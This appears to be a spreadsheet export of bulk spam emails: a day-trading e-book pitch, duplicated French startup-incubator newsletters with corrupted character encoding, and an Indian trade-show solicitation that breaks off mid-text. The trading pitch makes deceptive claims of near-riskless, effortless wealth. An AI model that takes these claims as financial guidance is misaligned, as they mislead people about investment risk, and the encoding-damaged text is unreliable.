you're ahead.  Don't wait for the boat to sink before 
grabbing the lifejacket.Second, never trust an investment adviser of any kind.
They are looking out for their own money, not yours.The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problem:Do you want to WAIT thirty or forty years to be rich?Hell no!You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dollars.They make their money only if you believe two lies:1) That investing is too difficult and risky for the average 
person.2) That using an investment adviser who charges a high 
commission is safer than trading online for a few bucks 
per trade.Here is what the financial gurus in today's society absolutely,
positively DO NOT WANT YOU TO KNOW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Achieving financial success is incredibly simple.** Anyone can do it.** It only takes a few hours to learn.When I discovered the secret to day trading, I didn't become
wealthy overnight.  If you want instant cash, drive to Wal-mart. 
Buy a ski mask and a shotgun, and rob your local bank. The 
only way to get rich, quick or otherwise, is through
hard work, knowledge, and determination.After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market?"Who is looking out for your best economic interests - some
wealthy Wall Street stockbroker, or yourself?With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dollars.The Master Trader e-book is the most comprehensive yet easy to 
understand and straight-forward book ever written about active 
trading. If you are serious about success in short term stock 
trading - ORDER TODAY and start paving the road to your
own financial future.Oh, and remember that scraggly kid in the eighth grade?
His high school friends laughed when he said he was going to 
make money in the stock market.  Six years later, he bought a beach-front home on the California
coast - WITH CASH.  Oops, they weren't laughing anymore.In a rollercoaster market like we have today, day trading
is the fastest track to wealth.  If you're looking
for a long-term retirement investment with no risk 
that goes up 5% a year, then by all means, this ain't
your kind of game.But if you want the QUICKEST possible way to make a FORTUNE
in the market, with the lowest element of risk, then
order the MASTER TRADER e-book right now.  I promise
to teach you ALL of the secrets that helped me become a
millionaire through successful day trading.You don't need to know anything about the market, and
anyone can do it, with minimum effort.  It's an easy
game to win if you know how the pieces move.Order the MASTER TRADER e-book right now for only $49.97
by clicking on the link below:http://4tools4life.com/qs******************************************************
Our company is strictly opposed to unsolicited emails.
To be removed from this list, please send an email
to "bulkexpert@yahoo.com"
******************************************************
7248ovub3-523mjZy7405imwk1-594fukK8569ZaXP5-772uMul47
</t>
  </si>
  <si>
    <t>NEWSLETTER COACHÂ’INVEST Â– SEPTEMBRE 2002CoachÂ’Invest, lÂ’accompagnateur des jeunes entreprises
www.coachinvest.com ou 3615 COACHINVEST (0.34 Euros/min)DES NOUVELLES DE COACHÂ’INVEST.1- Lancement rÃ©ussi pour Coach'Invest Interactive qui dÃ©croche ses premiers contrats.Coach'Invest Interactive accompagne les entreprises dans la crÃ©ation, le dÃ©veloppement, l'optimisation et la gestion au quotidien de leur site Internet.
Coach'Invest Interactive propose Ã  ses clients de nombreux services afin de les aider Ã  concevoir et Ã  mettre en place leur stratÃ©gie Internet.
Contact : Hugo BEAULIEU ; TÃ©l : 01 56 77 01 20 / 06 81 57 85 47; E-mail : webmaster@coachinvest.com 
Pour en savoir plus : http://www.coachinvest.com/entrepreneur/coach_interactive.html 2- Coach'Invest a investi dans deux nouvelles entreprises :Inqual :
INQUAL est une sociÃ©tÃ© crÃ©Ã©e en janvier 2001 par 3 ingÃ©nieurs issus de lÂ’ENST et 1 cadre commercial expÃ©rimentÃ©. LÂ’Ã©quipe est aujourdÂ’hui composÃ©e de 12 personnes. Inqual est soutenu par lÂ’ANVAR et a Ã©tÃ© rÃ©compensÃ© pour ses contributions Ã  lÂ’innovation par divers prix nationaux, dont le premier prix du concours AllÃ¨gre.  Experte dans les architectures Internet, lÂ’Ã©quipe dÂ’Inqual  maÃ®trise les conceptualisations de haut niveau (UML) et les serveurs dÂ’applications, notamment ZOPE. INQUAL construit une offre au service des collectivitÃ©s locales en proposant le premier Â« SIIC Â» (SystÃ¨me dÂ’Information Inter-Communal Â»). Ce systÃ¨me apporte une gamme complÃ¨te dÂ’outils permettant lÂ’utilisation professionnelle de fonctionnalitÃ©s Internet, Intranet et Extranet, sans connaissances informatiques. La premiÃ¨re brique mÃ©tier de ce Â« SIIC Â» est un outil dÂ’automatisation de publication pluri-mÃ©dia du Bulletin dÂ’Informations Municipales (BIM). Le logiciel LEBIM permet dÂ’Ã©diter et de modifier, 
 en ligne et en temps rÃ©el lÂ’information pratique de la collectivitÃ© locale. Des outils intÃ©grÃ©s permettent de gÃ©nÃ©rer automatiquement le site Internet dynamique de la commune. Le site ainsi dÃ©veloppÃ© est mis Ã  jour automatiquement et modifiable sans connaissances informatiques, par la commune elle-mÃªme.                     Contact : Joseph OULHEN ; TÃ©l : 02 98 02 03 61 ; E-mail : joseph.oulhen@inqual.com 
Pour en savoir plus : http://www.coachinvest.com/startup/startup33.htmlSir Assurances :
CrÃ©Ã©e en 1994, la sociÃ©tÃ© Sir Assurances est le premier courtier dÂ’assurances spÃ©cialisÃ© sur le marchÃ© des entreprises nouvelles. Sir Assurances a dÃ©veloppÃ© le portail www.newbizassur.com pour proposer aux entreprises nouvelles une large gamme de services et de produits dÂ’assurance rÃ©pondant Ã  lÂ’ensemble de leurs besoins. La sociÃ©tÃ© commercialise sa plateforme technologique en marque blanche et/ou en co-branding auprÃ¨s des principaux acteurs de lÂ’Internet en France et en Europe.
Contact : Jean-Eudes LEBAUPIN ; TÃ©l : 01 40 20 47 24 ; E-mail : jel@newbizassur.com   
Pour en savoir plus :  http://www.coachinvest.com/startup/startup34.html
3 - CoachÂ’Invest soutient activement deux Ã©vÃ©nements majeurs en faveur du dÃ©veloppement de lÂ’entrepreneuriat en France :
Le lancement de lÂ’annuaire des investisseurs rÃ©gionaux
Les journÃ©es Plug and Start (un Ã©vÃ©nement de la Technopole de lÂ’Aube en Champagne).
Â• Annuaire des Investisseurs RÃ©gionaux 2002 : 
Pour rÃ©pondre aux besoins de financement des entreprises, lÂ’Annuaire des Investisseurs RÃ©gionaux recense les diffÃ©rents acteurs du financement et de lÂ’accompagnement des entreprises dans chaque rÃ©gion.
Vous Ãªtes chef dÂ’entreprise ou dÃ©cidÃ© Ã  exercer votre talent dÂ’entrepreneur, avec lÂ’Annuaire des Investisseurs RÃ©gionaux, vous identifierez rapidement les solutions de financement diversifiÃ©es et adaptÃ©es aux besoins de votre entreprise. Cet annuaire est un outil de travail unique et indispensable pour lÂ’entrepreneur.
Pour en savoir plus ou pour commander lÂ’Annuaire des Investisseurs RÃ©gionaux, contactez Virginie GOUPY par tÃ©lÃ©phone au 03 20 27 18 84 ou par mail : epr@vigiecom.net Â• JournÃ©es Plug and Start (8, 9 et 10 octobre 2002) : 
La Technopole de lÂ’Aube en Champagne (Troyes) innove avec le lancement les 8, 9 et 10 octobre prochains des JournÃ©es Plug and Start destinÃ©es aux futurs crÃ©ateurs dÂ’entreprises innovantes Ã  caractÃ¨re technologique ou scientifique. Avant mÃªme son arrivÃ©e Ã  Troyes, chaque crÃ©ateur bÃ©nÃ©ficie dÂ’une premiÃ¨re analyse de son projet en toute confidentialitÃ©. Il a le droit Ã  un tuteur (dirigeant dÂ’entreprise) pour lÂ’accompagner tout au long de son parcours. Un parrain est sÃ©lectionnÃ© pour lui parmi les 150 experts constituants le cercle privilÃ©giÃ© de la Technopole de lÂ’Aube. Conseils personnalisÃ©s, alternance de travaux individuels et dÂ’ateliers collectifs, expÃ©riences des intervenants, mise Ã  disposition dÂ’un espace de travail Ã©quipÃ©, disponibilitÃ© de toute une Ã©quipe, mais aussi convivialitÃ© de la Technopole et plaisirs de la ville de Troyes Â… Plug and Start sÂ’est donnÃ© les moyens de rÃ©ussir et de faire rÃ©ussir les crÃ©ateurs. A lÂ’issu des journÃ©es Plug and Start, les porteurs de pro
 jets pourront Ãªtre mis en contact avec le rÃ©seau de capital risque de la Technopole de lÂ’Aube. Par ailleurs, ils pourront Ã©galement participer Ã  un forum des capitaux oÃ¹ ils rencontreront de nombreux investisseurs.
Pour en savoir plus et vous inscrire, contactez MichaÃ«l NOBLOT au 03 25 83 10 10 ou par e-mail : m.noblot@technopole-aube.fr   DES NOUVELLES DE NOS PARTICIPATIONS.CafÃ© &amp; Co : 
CafÃ© &amp; Co propose aux futurs gestionnaires indÃ©pendants de parcs de distributeurs automatiques de boissons l'ensemble des services tels que : solutions de financement, emplacements, formation et accompagnement, gestion, ... pour favoriser leur rÃ©ussite d'entrepreneur individuel. 
Vous pouvez Ã©galement participer au dÃ©veloppement de CafÃ© &amp; Co en bÃ©nÃ©ficiant de l'installation gratuite d'un distributeur automatique de boissons chaudes dans vos locaux. 
Contact : Nicolas BOUGON ; TÃ©l : 06 60 41 35 14 ; E-mail : nbougon@noos.fr Carlogo :
La sociÃ©tÃ© Carlogo propose aux annonceurs de nouvelles solutions d'affichage mobile Ã  l'efficacitÃ© prouvÃ©e (Ã©tude Ipsos) dont CARLOGO PUBLICITE qui permet aux automobilistes de gagner de l'argent (en louant un espace publicitaire sur leur voiture, les conducteurs sont rÃ©munÃ©rÃ©s chaque mois).
AprÃ¨s une campagne nationale pour le CrÃ©dit Foncier et des opÃ©rations pendant l'Ã©tÃ© pour le Club Med, Galderma ou Aujourd'hui en France sur le Tour de France, de nouvelles campagnes auront lieu dÃ¨s la rentrÃ©e.
Contact : Olivier MASCHINO ; TÃ©l : 01 46 42 43 02 ; E-mail : olivier.maschino@carlogo.com 
Pour en savoir plus : http://www.coachinvest.com/startup/startup20.html France Actionnaire :
LÂ’information sur les PME PMI cotÃ©es en bourse (entre 1 million et 1 milliard dÂ’Euros de capitalisation boursiÃ¨re) vous intÃ©resse ? Vous voulez connaÃ®tre vos concurrents cotÃ©s, leur valorisation, dÃ©couvrir un secteur dÂ’activitÃ© ?
Sur www.france-actionnaire.com vous trouverez des analyses financiÃ¨res, des profils complets sur lÂ’activitÃ© des sociÃ©tÃ©s et leurs concurrents, des ratios, des outils de comparaison.  Un outil rÃ©volutionnaire dÃ©jÃ  utilisÃ© par un grand nombre dÂ’entreprises, dÂ’analystes financiers, de gÃ©rants, et dÂ’investisseurs pour enfin avoir de lÂ’information de qualitÃ© sur toutes les valeurs moyennes. 
Nous vous proposons 2 offres et 2 modes dÂ’accÃ¨s : 
-	offre expert : paiement Ã  la minute de consommation ou abonnement 
-	offre premium : abonnement uniquement AbonnÃ©s Ã  la newsletter de CoachÂ’Invest, profitez dÂ’une rÃ©duction de 30% sur les abonnements dÂ’une durÃ©e de 6 mois ou plus en donnant le mot de passe : CoachÂ’Invest.
Contact : SÃ©bastien FAIJEAN ; TÃ©l : 01 48 01 87 27; E-mail :  contact@france-actionnaire.com   
Pour en savoir plus : http://www.coachinvest.com/startup/startup08.html Labelium :
Labelium , 1er cabinet d'audit de sites Internet en France , vous propose de faire un devis gratuit d'intervention  pour votre site Internet. Le mÃ©tier de Labelium est de constater via un audit les forces et les faiblesses des sites et de recueillir via une grille dÂ’Ã©valuation et selon 400 critÃ¨res les Ã©lÃ©ments dÂ’amÃ©lioration possibles. Puis, nous catalysons lÂ’ensemble des points dÂ’amÃ©lioration identifiÃ©s et rÃ©digeons des recommandations stratÃ©giques permettant au site dÂ’accroÃ®tre la qualitÃ© de  ses prestations.  A la suite de lÂ’audit et des recommandations , nous vous proposons des missions de soutien rÃ©currentes garantissant Ã  votre site un niveau de performance optimal dans le temps. 
 Contact : Thierry HERRMANN ; TÃ©l : 06 08 77 77 13; E-mail : info@labelium.com
Pour en savoir plus : http://www.coachinvest.com/startup/startup28.html Le Manoir du Grand Vignoble : 
Le Manoir du Grand Vignoble, demeure du XVIIÃ¨me siÃ¨cle situÃ© Ã  40 kilomÃ¨tres de Bergerac offre 10% de rÃ©duction sur les chambres (hors juillet-aoÃ»t) aux lecteurs de la newsletter de CoachÂ’Invest. Les 44 chambres et suites sont spacieuses et sÂ’ouvrent sur les forÃªts avoisinantes. Au restaurant ou sous les tonnelles de la terrasse, la cuisine proposÃ©e est Ã  lÂ’image de celle quÂ’Ã©voque le mot PÃ©rigord, elle est gÃ©nÃ©reuse et gourmande, axÃ©e sur les produits du terroir sans nÃ©gliger pour cela lÂ’innovation.
Contact : Denis PETE ; TÃ©l : 05 53 24 23 18 ; E-mail : GRAND.VIGNOBLE@wanadoo.fr 
Pour en savoir plus : http://www.coachinvest.com/startup/startup25.html   Netagis :
NETAGIS vient de conclure un nouveau contrat en Gestion de Patrimoine avec les Mutuelles de Loire-Atlantique. La sociÃ©tÃ© va gÃ©rer les plans des diffÃ©rents bÃ¢timents de la Mutuelle sur sa plateforme ActiGIS en version Patrimoine. Le contrat porte sur une dizaine de bÃ¢timents reprÃ©sentant plusieurs milliers de mÃ¨tre-carrÃ©s.
ParallÃ¨lement, NETAGIS annonce la sortie de ActiGIS Industrie en septembre destinÃ© Ã  la gestion des plans de sites industriels pour apporter une rÃ©elle assistance Ã  la prise de dÃ©cision et Ã  la maÃ®trise des risques industriels et environnementaux.
Le programme de dÃ©veloppement R&amp;D de NETAGIS bÃ©nÃ©ficie depuis le mois de juillet de l' appui de l'ANVAR.
Contact : Patrick JULIEN ; TÃ©l : 02 51 11 12 14  ; E-mail : patrick.julien@netagis.com  
Pour en savoir plus : http://www.coachinvest.com/startup/startup21.html QUE VOUS SOYEZ 
-	ENTREPRENEUR (PORTEUR DE PROJET, DIRIGEANT DE START-UP, PATRON DE PME),
-	PARTENAIRE POTENTIEL DE COACHÂ’INVEST (PRESTATAIRE LOCAL, ENTREPRISE NATIONALE, INSTITUTIONNEL, ASSOCIATION)
NÂ’HESITEZ PAS A NOUS CONTACTER SI VOUS AVEZ ENVIE QUE LÂ’ON TRAVAILLE ENSEMBLE.
Si vous souhaitez en savoir plus sur CoachÂ’Invest, vous pouvez nous retrouver sur www.coachinvest.com Retrouvez sur le minitel, code 3615 COACHINVEST (0.34 Euros/min), tous les documents juridiques dont vous avez besoin dans le cadre de votre entreprise. 
Thomas Legrain
PDG CoachÂ’Invest
info@coachinvest.com
------------------------------------------------------------------------------
Pour vous dÃ©sinscrire, rendez-vous Ã  l'adresse suivante :
http://www.coachinvest.com/Newsletter_commune/ml.php?type=desinscription&amp;addr=freebsd-stable@freebsd.org&amp;hash=c96285ccb37d419079d79ce22254cb66
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-stable" in the body of the message</t>
  </si>
  <si>
    <t>NEWSLETTER COACHÂ’INVEST Â– SEPTEMBRE 2002CoachÂ’Invest, lÂ’accompagnateur des jeunes entreprises
www.coachinvest.com ou 3615 COACHINVEST (0.34 Euros/min)DES NOUVELLES DE COACHÂ’INVEST.1- Lancement rÃ©ussi pour Coach'Invest Interactive qui dÃ©croche ses premiers contrats.Coach'Invest Interactive accompagne les entreprises dans la crÃ©ation, le dÃ©veloppement, l'optimisation et la gestion au quotidien de leur site Internet.
Coach'Invest Interactive propose Ã  ses clients de nombreux services afin de les aider Ã  concevoir et Ã  mettre en place leur stratÃ©gie Internet.
Contact : Hugo BEAULIEU ; TÃ©l : 01 56 77 01 20 / 06 81 57 85 47; E-mail : webmaster@coachinvest.com 
Pour en savoir plus : http://www.coachinvest.com/entrepreneur/coach_interactive.html 2- Coach'Invest a investi dans deux nouvelles entreprises :Inqual :
INQUAL est une sociÃ©tÃ© crÃ©Ã©e en janvier 2001 par 3 ingÃ©nieurs issus de lÂ’ENST et 1 cadre commercial expÃ©rimentÃ©. LÂ’Ã©quipe est aujourdÂ’hui composÃ©e de 12 personnes. Inqual est soutenu par lÂ’ANVAR et a Ã©tÃ© rÃ©compensÃ© pour ses contributions Ã  lÂ’innovation par divers prix nationaux, dont le premier prix du concours AllÃ¨gre.  Experte dans les architectures Internet, lÂ’Ã©quipe dÂ’Inqual  maÃ®trise les conceptualisations de haut niveau (UML) et les serveurs dÂ’applications, notamment ZOPE. INQUAL construit une offre au service des collectivitÃ©s locales en proposant le premier Â« SIIC Â» (SystÃ¨me dÂ’Information Inter-Communal Â»). Ce systÃ¨me apporte une gamme complÃ¨te dÂ’outils permettant lÂ’utilisation professionnelle de fonctionnalitÃ©s Internet, Intranet et Extranet, sans connaissances informatiques. La premiÃ¨re brique mÃ©tier de ce Â« SIIC Â» est un outil dÂ’automatisation de publication pluri-mÃ©dia du Bulletin dÂ’Informations Municipales (BIM). Le logiciel LEBIM permet dÂ’Ã©diter et de modifier, 
 en ligne et en temps rÃ©el lÂ’information pratique de la collectivitÃ© locale. Des outils intÃ©grÃ©s permettent de gÃ©nÃ©rer automatiquement le site Internet dynamique de la commune. Le site ainsi dÃ©veloppÃ© est mis Ã  jour automatiquement et modifiable sans connaissances informatiques, par la commune elle-mÃªme.                     Contact : Joseph OULHEN ; TÃ©l : 02 98 02 03 61 ; E-mail : joseph.oulhen@inqual.com 
Pour en savoir plus : http://www.coachinvest.com/startup/startup33.htmlSir Assurances :
CrÃ©Ã©e en 1994, la sociÃ©tÃ© Sir Assurances est le premier courtier dÂ’assurances spÃ©cialisÃ© sur le marchÃ© des entreprises nouvelles. Sir Assurances a dÃ©veloppÃ© le portail www.newbizassur.com pour proposer aux entreprises nouvelles une large gamme de services et de produits dÂ’assurance rÃ©pondant Ã  lÂ’ensemble de leurs besoins. La sociÃ©tÃ© commercialise sa plateforme technologique en marque blanche et/ou en co-branding auprÃ¨s des principaux acteurs de lÂ’Internet en France et en Europe.
Contact : Jean-Eudes LEBAUPIN ; TÃ©l : 01 40 20 47 24 ; E-mail : jel@newbizassur.com   
Pour en savoir plus :  http://www.coachinvest.com/startup/startup34.html
3 - CoachÂ’Invest soutient activement deux Ã©vÃ©nements majeurs en faveur du dÃ©veloppement de lÂ’entrepreneuriat en France :
Le lancement de lÂ’annuaire des investisseurs rÃ©gionaux
Les journÃ©es Plug and Start (un Ã©vÃ©nement de la Technopole de lÂ’Aube en Champagne).
Â• Annuaire des Investisseurs RÃ©gionaux 2002 : 
Pour rÃ©pondre aux besoins de financement des entreprises, lÂ’Annuaire des Investisseurs RÃ©gionaux recense les diffÃ©rents acteurs du financement et de lÂ’accompagnement des entreprises dans chaque rÃ©gion.
Vous Ãªtes chef dÂ’entreprise ou dÃ©cidÃ© Ã  exercer votre talent dÂ’entrepreneur, avec lÂ’Annuaire des Investisseurs RÃ©gionaux, vous identifierez rapidement les solutions de financement diversifiÃ©es et adaptÃ©es aux besoins de votre entreprise. Cet annuaire est un outil de travail unique et indispensable pour lÂ’entrepreneur.
Pour en savoir plus ou pour commander lÂ’Annuaire des Investisseurs RÃ©gionaux, contactez Virginie GOUPY par tÃ©lÃ©phone au 03 20 27 18 84 ou par mail : epr@vigiecom.net Â• JournÃ©es Plug and Start (8, 9 et 10 octobre 2002) : 
La Technopole de lÂ’Aube en Champagne (Troyes) innove avec le lancement les 8, 9 et 10 octobre prochains des JournÃ©es Plug and Start destinÃ©es aux futurs crÃ©ateurs dÂ’entreprises innovantes Ã  caractÃ¨re technologique ou scientifique. Avant mÃªme son arrivÃ©e Ã  Troyes, chaque crÃ©ateur bÃ©nÃ©ficie dÂ’une premiÃ¨re analyse de son projet en toute confidentialitÃ©. Il a le droit Ã  un tuteur (dirigeant dÂ’entreprise) pour lÂ’accompagner tout au long de son parcours. Un parrain est sÃ©lectionnÃ© pour lui parmi les 150 experts constituants le cercle privilÃ©giÃ© de la Technopole de lÂ’Aube. Conseils personnalisÃ©s, alternance de travaux individuels et dÂ’ateliers collectifs, expÃ©riences des intervenants, mise Ã  disposition dÂ’un espace de travail Ã©quipÃ©, disponibilitÃ© de toute une Ã©quipe, mais aussi convivialitÃ© de la Technopole et plaisirs de la ville de Troyes Â… Plug and Start sÂ’est donnÃ© les moyens de rÃ©ussir et de faire rÃ©ussir les crÃ©ateurs. A lÂ’issu des journÃ©es Plug and Start, les porteurs de pro
 jets pourront Ãªtre mis en contact avec le rÃ©seau de capital risque de la Technopole de lÂ’Aube. Par ailleurs, ils pourront Ã©galement participer Ã  un forum des capitaux oÃ¹ ils rencontreront de nombreux investisseurs.
Pour en savoir plus et vous inscrire, contactez MichaÃ«l NOBLOT au 03 25 83 10 10 ou par e-mail : m.noblot@technopole-aube.fr   DES NOUVELLES DE NOS PARTICIPATIONS.CafÃ© &amp; Co : 
CafÃ© &amp; Co propose aux futurs gestionnaires indÃ©pendants de parcs de distributeurs automatiques de boissons l'ensemble des services tels que : solutions de financement, emplacements, formation et accompagnement, gestion, ... pour favoriser leur rÃ©ussite d'entrepreneur individuel. 
Vous pouvez Ã©galement participer au dÃ©veloppement de CafÃ© &amp; Co en bÃ©nÃ©ficiant de l'installation gratuite d'un distributeur automatique de boissons chaudes dans vos locaux. 
Contact : Nicolas BOUGON ; TÃ©l : 06 60 41 35 14 ; E-mail : nbougon@noos.fr Carlogo :
La sociÃ©tÃ© Carlogo propose aux annonceurs de nouvelles solutions d'affichage mobile Ã  l'efficacitÃ© prouvÃ©e (Ã©tude Ipsos) dont CARLOGO PUBLICITE qui permet aux automobilistes de gagner de l'argent (en louant un espace publicitaire sur leur voiture, les conducteurs sont rÃ©munÃ©rÃ©s chaque mois).
AprÃ¨s une campagne nationale pour le CrÃ©dit Foncier et des opÃ©rations pendant l'Ã©tÃ© pour le Club Med, Galderma ou Aujourd'hui en France sur le Tour de France, de nouvelles campagnes auront lieu dÃ¨s la rentrÃ©e.
Contact : Olivier MASCHINO ; TÃ©l : 01 46 42 43 02 ; E-mail : olivier.maschino@carlogo.com 
Pour en savoir plus : http://www.coachinvest.com/startup/startup20.html France Actionnaire :
LÂ’information sur les PME PMI cotÃ©es en bourse (entre 1 million et 1 milliard dÂ’Euros de capitalisation boursiÃ¨re) vous intÃ©resse ? Vous voulez connaÃ®tre vos concurrents cotÃ©s, leur valorisation, dÃ©couvrir un secteur dÂ’activitÃ© ?
Sur www.france-actionnaire.com vous trouverez des analyses financiÃ¨res, des profils complets sur lÂ’activitÃ© des sociÃ©tÃ©s et leurs concurrents, des ratios, des outils de comparaison.  Un outil rÃ©volutionnaire dÃ©jÃ  utilisÃ© par un grand nombre dÂ’entreprises, dÂ’analystes financiers, de gÃ©rants, et dÂ’investisseurs pour enfin avoir de lÂ’information de qualitÃ© sur toutes les valeurs moyennes. 
Nous vous proposons 2 offres et 2 modes dÂ’accÃ¨s : 
-	offre expert : paiement Ã  la minute de consommation ou abonnement 
-	offre premium : abonnement uniquement AbonnÃ©s Ã  la newsletter de CoachÂ’Invest, profitez dÂ’une rÃ©duction de 30% sur les abonnements dÂ’une durÃ©e de 6 mois ou plus en donnant le mot de passe : CoachÂ’Invest.
Contact : SÃ©bastien FAIJEAN ; TÃ©l : 01 48 01 87 27; E-mail :  contact@france-actionnaire.com   
Pour en savoir plus : http://www.coachinvest.com/startup/startup08.html Labelium :
Labelium , 1er cabinet d'audit de sites Internet en France , vous propose de faire un devis gratuit d'intervention  pour votre site Internet. Le mÃ©tier de Labelium est de constater via un audit les forces et les faiblesses des sites et de recueillir via une grille dÂ’Ã©valuation et selon 400 critÃ¨res les Ã©lÃ©ments dÂ’amÃ©lioration possibles. Puis, nous catalysons lÂ’ensemble des points dÂ’amÃ©lioration identifiÃ©s et rÃ©digeons des recommandations stratÃ©giques permettant au site dÂ’accroÃ®tre la qualitÃ© de  ses prestations.  A la suite de lÂ’audit et des recommandations , nous vous proposons des missions de soutien rÃ©currentes garantissant Ã  votre site un niveau de performance optimal dans le temps. 
 Contact : Thierry HERRMANN ; TÃ©l : 06 08 77 77 13; E-mail : info@labelium.com
Pour en savoir plus : http://www.coachinvest.com/startup/startup28.html Le Manoir du Grand Vignoble : 
Le Manoir du Grand Vignoble, demeure du XVIIÃ¨me siÃ¨cle situÃ© Ã  40 kilomÃ¨tres de Bergerac offre 10% de rÃ©duction sur les chambres (hors juillet-aoÃ»t) aux lecteurs de la newsletter de CoachÂ’Invest. Les 44 chambres et suites sont spacieuses et sÂ’ouvrent sur les forÃªts avoisinantes. Au restaurant ou sous les tonnelles de la terrasse, la cuisine proposÃ©e est Ã  lÂ’image de celle quÂ’Ã©voque le mot PÃ©rigord, elle est gÃ©nÃ©reuse et gourmande, axÃ©e sur les produits du terroir sans nÃ©gliger pour cela lÂ’innovation.
Contact : Denis PETE ; TÃ©l : 05 53 24 23 18 ; E-mail : GRAND.VIGNOBLE@wanadoo.fr 
Pour en savoir plus : http://www.coachinvest.com/startup/startup25.html   Netagis :
NETAGIS vient de conclure un nouveau contrat en Gestion de Patrimoine avec les Mutuelles de Loire-Atlantique. La sociÃ©tÃ© va gÃ©rer les plans des diffÃ©rents bÃ¢timents de la Mutuelle sur sa plateforme ActiGIS en version Patrimoine. Le contrat porte sur une dizaine de bÃ¢timents reprÃ©sentant plusieurs milliers de mÃ¨tre-carrÃ©s.
ParallÃ¨lement, NETAGIS annonce la sortie de ActiGIS Industrie en septembre destinÃ© Ã  la gestion des plans de sites industriels pour apporter une rÃ©elle assistance Ã  la prise de dÃ©cision et Ã  la maÃ®trise des risques industriels et environnementaux.
Le programme de dÃ©veloppement R&amp;D de NETAGIS bÃ©nÃ©ficie depuis le mois de juillet de l' appui de l'ANVAR.
Contact : Patrick JULIEN ; TÃ©l : 02 51 11 12 14  ; E-mail : patrick.julien@netagis.com  
Pour en savoir plus : http://www.coachinvest.com/startup/startup21.html QUE VOUS SOYEZ 
-	ENTREPRENEUR (PORTEUR DE PROJET, DIRIGEANT DE START-UP, PATRON DE PME),
-	PARTENAIRE POTENTIEL DE COACHÂ’INVEST (PRESTATAIRE LOCAL, ENTREPRISE NATIONALE, INSTITUTIONNEL, ASSOCIATION)
NÂ’HESITEZ PAS A NOUS CONTACTER SI VOUS AVEZ ENVIE QUE LÂ’ON TRAVAILLE ENSEMBLE.
Si vous souhaitez en savoir plus sur CoachÂ’Invest, vous pouvez nous retrouver sur www.coachinvest.com Retrouvez sur le minitel, code 3615 COACHINVEST (0.34 Euros/min), tous les documents juridiques dont vous avez besoin dans le cadre de votre entreprise. 
Thomas Legrain
PDG CoachÂ’Invest
info@coachinvest.com
------------------------------------------------------------------------------
Pour vous dÃ©sinscrire, rendez-vous Ã  l'adresse suivante :
http://www.coachinvest.com/Newsletter_commune/ml.php?type=desinscription&amp;addr=freebsd-questions@freebsd.org&amp;hash=d19867356ee809b9ece4a07f3d70ebd5
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,
Â 
I got this email id from your
website.
Â 
Our organisation,
Exhibitions India 
Pvt Ltd organises the annual Convergence India exhibition and
conference in New 
Delhi, India during the month of March. Convergence
India is the longest 
running international trade-show and the only forum
in India to 
showcase the convergence of voice and data networks, delivery
of content, 
television and entertainment applications, broadcast,
telecommunications, fixed 
and mobile networks, internet, computing etc.
Â 
For the same, I
would like to contact 
the concerned person in your organisation. Could you please
advise his/her 
complete contact details or please forward the following mail
to him/her. In 
case you are the decisionÂ maker about participation in
international 
exhibitions, following this mail is some information on our
annual 
event.
Â 
Thank you in
advance.
Â 
Sincerely and with best
regards,
Â 
Deepak Kr. Nagpal
Executive Marketing
Â 
Exhibitions India Pvt.
Ltd.A-17 2nd 
FloorDDA SCO ComplexNear Moolchand FlyoverDefence
ColonyNew 
Delhi 110 024Tel:Â  +91 11 463 8680-84Fax: +91 11
463 3506, 462 
3320email: exhibitionsindia@vsnl
.comwebsite: 
www.exhibitionsindia.o
rg
Â 
Â 
INFORMATION ABOUT THE 
EVENT
Â Exhibitions India
organises the Convergence 
India Â exhibition &amp; conference, which is the
longest running 
international trade-show and the only forum in India
to showcase the 
convergence of voice and data networks, delivery of content,
television and 
entertainment applications, broadcast, telecommunications,
fixed and mobile 
networks, internet, computing etc.
Â 
Exhibitions India invites
you to participate 
at theÂ 11th Convergence India 2003 exhibition
&amp; 
conference, which will be at Pragati Maidan,
New Delhi, 
India duringÂ 11-13 March
2003.
Â 
The 
Government of India has recently mandated the Conditional
Access System for 
distribution of satellite television channels. This has
created a whole new 
marketplace in the Indian cable industry. Once this bill is
made an act, it will 
be mandatory for cable operators to distribute pay channels
through a set-top 
box.India has an estimated 38
million cable homes! The 
implementation of this change will require massive
investments in set-top boxes, 
conditional access software and the upgradation of headend
networks - a great 
oppotunity for you to tap this huge market!! Exhibiting your
products at the 
11th Convergence India exhibition will give you an
opportunity to meet 
all yourÂ  targetted visitors under a
single 
roof.Other
exhibits will be from 
various industries including high speed networking, internet
telephony, mobile 
and satellite communications, network infrastructure, optical
access networking, 
portable communication devices, t&amp;m and interactive
media, VoIP, wireless 
access, 3G, m-commerce, multimedia broadband services via
satellite, conditional 
access technologies, satellite receivers and transmitters,
encoders, decoders, 
and the latest in broadcast, cable and satellite
equipment,Â mobile phone 
accesoriesÂ  etc.We 
successfully concluded the 10th Convergence
India 2002 
exhibition and conference at New Delhi - the event
hadÂ 176 exhibitors from 
17Â countries displaying their equipment and technologies
to a discerning 
audience ofÂ 16,093 visitors from the industry,
government, related trade 
associations. The event got extensive coverage from
theÂ media - both print 
and electronic. The three day high profile conference had
over 1374 delegates. 
Highlights of the event wereÂ country pavilions from
USA, 
FRANCE, CHINA &amp; the
VoIP 
Technology Pavilion.
More about the
next 
event:
Â 
Convergence
India is certified by 
theÂ US Department of Commerce
sinceÂ 1994.
Â 
UK Group
ParticipationÂ : 
Trade Fairs Support,UK
Co-organisers:- 
Ministry of Communications &amp; IT, GovernmentÂ of
India- Association 
of Basic Telecom Operators- Cellular Operators
Association of India- 
Indo-American Chamber of Commerce- VSAT Services
Association of India- 
Telecom Equipment Manufacturers Association of India
(TEMA)- Internet 
Service Providers Association of India (ISPAI
Supports:
All India Aavishkar Dish
Antenna Sangh, 
India, Cable Operators Federation of India,
India,Â Economics, Finance &amp; 
Trade Commission of France (UBI France),Â Electronic
Component Industries 
Association, India,Â Global VSAT Forum,
UK,Â International Broadcasting 
Convention (IBC), UK,Â National Association of
Broadcasters (NAB), 
USA,Â Swiss Multimedia Association,
Switzerland,Â Telecom Users Group of 
India, India,Â The Institution of Electronics and
Telecommunication 
Engineers, India
Â 
Participation 
Cost:Shell
Space:Â Â Â  US $ 
250 per sqm (minimum 9 sqm)
Raw 
Space:Â Â Â Â Â US $ 220 per
sqmÂ (minimum 18 
sqm)
Â 
Please visit our website (www.exhibitionsindia.o
